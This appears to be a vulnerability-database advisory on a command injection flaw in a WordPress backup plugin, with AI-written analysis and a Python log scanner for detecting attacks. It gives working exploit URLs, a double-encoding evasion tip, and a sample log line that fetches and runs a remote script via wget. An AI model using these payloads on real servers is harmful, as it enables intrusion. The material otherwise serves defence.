CVE-2014-3114
Description
The EZPZ One Click Backup plugin for WordPress <=12.03.10 allows unauthenticated remote attackers to execute arbitrary OS commands via the cmd parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The EZPZ One Click Backup plugin for WordPress, version 12.03.10 and earlier, contains an OS command injection vulnerability in the file functions/ezpz-archive-cmd.php. The plugin directly passes the user-supplied cmd GET parameter to the PHP exec() function without any sanitization or validation, as shown in the source code: exec(urldecode($_GET['cmd']));. This allows an unauthenticated remote attacker to inject arbitrary operating system commands. [1]
Exploitation
An attacker exploits this by sending a crafted HTTP GET request to the vulnerable plugin file with a malicious cmd parameter; no authentication or prior access is required. For example, a request to http://target/wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=id executes id on the server. Because exec() hands the string to the system shell, the attacker can chain multiple commands with shell metacharacters such as ; or |. Note also that PHP has already percent-decoded the value in $_GET before the plugin calls urldecode() on it, so a payload may be double-encoded, which defeats naive pattern matching on the raw query string. [1]
Impact
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the web server user. This can lead to full compromise of the WordPress site, including data exfiltration, file modification, installation of backdoors, and potential lateral movement within the hosting environment. [1]
Mitigation
No patched version of the plugin has been released. The vendor was unresponsive, and the WordPress plugins team was notified on 2014-04-30. The only effective mitigation is to immediately remove (uninstall) the EZPZ One Click Backup plugin from any affected WordPress installation. The plugin is considered abandoned and should not be used. [1]
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2 entries (no CPE assigned):
- range: <= 12.03.10
- range: <= 12.03.10
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The plugin passes the unsanitized `cmd` GET parameter directly to PHP's `exec()` function, enabling arbitrary OS command execution."
Attack vector
An unauthenticated remote attacker sends an HTTP GET request to `functions/ezpz-archive-cmd.php` with a `cmd` parameter containing arbitrary operating system commands [1]. The plugin passes the unsanitized `cmd` value directly to PHP's `exec()` function, which executes the command on the server [1]. No authentication or special privileges are required, making this trivially exploitable by anyone who can reach the WordPress installation [1].
Affected code
The vulnerable file is `functions/ezpz-archive-cmd.php` in the EZPZ One Click Backup plugin version 12.03.10 and earlier [1]. The file contains a single code block that directly passes user-supplied input to `exec()` without any sanitization [1].
What the fix does
No patch was ever released for this vulnerability; the plugin developer abandoned the project in 2012 and the advisory explicitly states "Fixed version: N/A" and "Solution: Remove plugin" [1]. The only remediation is to completely remove the plugin from any affected WordPress installation [1].
Preconditions
- config: The vulnerable plugin must be installed and accessible at the expected path under wp-content/plugins/
- auth: No authentication required; the attacker only needs network access to the WordPress site
- network: Attacker must be able to send HTTP GET requests to the WordPress server
- input: Attacker supplies arbitrary OS commands via the cmd GET parameter
Reproduction
Send a GET request to the vulnerable endpoint with a command in the `cmd` parameter. For example: `http://example.com/wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=uptime` [1].
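The request shape in the Exploitation and Reproduction sections is easy to hunt for in web-server access logs. The following is an added example, not code from the advisory or the plugin: it scans Apache/nginx "combined"-format log lines for hits on `ezpz-archive-cmd.php` carrying a `cmd` parameter and decodes the payload the way the plugin does. PHP percent-decodes the query string into `$_GET`, and the plugin then calls `urldecode()` on that value, so a double-encoded payload such as `cmd=%2569d` reaches `exec()` as `id`; the scanner decodes twice so such evasions are surfaced. The log lines are constructed sample data; the filename match is deliberately suffix-based because the plugin directory name is an assumption that an operator may have renamed.

```python
"""Scan access logs for CVE-2014-3114 (EZPZ One Click Backup) exploitation attempts."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote_plus

# The vulnerable script; matched on suffix so a renamed plugin directory still matches.
VULN_SUFFIX = "/functions/ezpz-archive-cmd.php"

# Apache/nginx "combined" log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Shell metacharacters that let one cmd value run several commands (exec() uses /bin/sh -c).
CHAIN_RE = re.compile(r"[;&|`$()\n]")


@dataclass
class Hit:
    ip: str
    time: str
    status: int
    raw_cmd: str        # exactly as it appeared in the query string
    decoded_cmd: str    # what the plugin would have handed to exec()
    double_encoded: bool
    chained: bool


def decode_like_plugin(raw: str) -> Tuple[str, bool]:
    """Mirror PHP: $_GET decodes once, then urldecode() decodes again."""
    once = unquote_plus(raw)      # value as seen in $_GET['cmd']
    twice = unquote_plus(once)    # value passed to exec()
    return twice, once != twice


def extract_cmd(target: str) -> Optional[str]:
    """Return the raw cmd= value if target is a request to the vulnerable script."""
    path, _, query = target.partition("?")
    if not path.endswith(VULN_SUFFIX):
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "cmd":
            return value
    return None


def scan(lines: Iterable[str]) -> List[Hit]:
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = extract_cmd(m["target"])
        if raw is None:
            continue
        decoded, double = decode_like_plugin(raw)
        hits.append(Hit(m["ip"], m["time"], int(m["status"]), raw, decoded,
                        double, bool(CHAIN_RE.search(decoded))))
    return hits


# Constructed sample log lines (not from any real incident).
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2014:10:15:02 +0000] "GET /wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=id HTTP/1.1" 200 31 "-" "curl/7.35.0"
203.0.113.7 - - [01/May/2014:10:15:09 +0000] "GET /wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=%2569d%253Buname%2520-a HTTP/1.1" 200 88 "-" "curl/7.35.0"
198.51.100.23 - - [01/May/2014:10:16:44 +0000] "GET /wp-content/plugins/ezpz-one-click-backup/css/style.css HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
198.51.100.23 - - [01/May/2014:10:17:01 +0000] "GET /?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/May/2014:10:18:30 +0000] "GET /wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=wget%20http://203.0.113.7/x.sh%20-O%20/tmp/x.sh%3Bsh%20/tmp/x.sh HTTP/1.1" 200 0 "-" "python-requests/2.2.1"
"""


if __name__ == "__main__":
    # Usage: python3 scan_ezpz.py /var/log/apache2/access.log  (sample data if no file given)
    source = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 \
        else SAMPLE_LOG.splitlines()
    for h in scan(source):
        flags = ("double-encoded " if h.double_encoded else "") + ("chained" if h.chained else "")
        print(f"{h.time} {h.ip} status={h.status} {flags.strip()}\n    exec: {h.decoded_cmd!r}")
```

Any hit with a 200 status should be treated as a likely successful execution, since the script returns 200 regardless of what the command did; the decoded command tells you what to look for on the host (dropped files, outbound fetches, new cron entries).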
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.openwall.com/lists/oss-security/2014/05/01/11 (oss-security mailing list post; MITRE reference, x_refsource_MLIST)
News mentions
No linked articles in our index yet.